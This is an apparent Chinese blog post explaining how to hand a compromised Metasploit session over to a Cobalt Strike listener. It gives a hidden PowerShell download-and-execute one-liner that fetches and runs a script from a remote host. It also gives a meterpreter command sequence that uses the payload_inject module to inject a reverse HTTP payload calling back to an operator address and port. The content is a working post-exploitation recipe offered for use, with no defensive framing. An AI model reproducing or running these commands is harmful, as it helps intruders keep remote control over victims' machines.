msf传递shell给cobalt strike

前提:拿到msf的session会话
方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))"

方法2:通过msf的exploit/windows/local/payload_inject模块
1.先在cobalt strike设置监听,我设置的监听类型windows/beacon_http/reverse_http
2.在msf中使用模块

meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/payload_inject
msf exploit(windows/local/payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(windows/local/payload_inject) > set lhost 192.168.1.11
lhost => 192.168.1.11
msf exploit(windows/local/payload_inject) > set lport 2333
lport => 2333
msf exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(windows/local/payload_inject) > set session 1
session => 1
msf exploit(windows/local/payload_inject) > run

3.可以看见在cobalt strike中上线了
4.如果出现错误,PID does not actually exist,可以设置一下pid,set pid 进程号(msf获取会话的进程的pid)

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值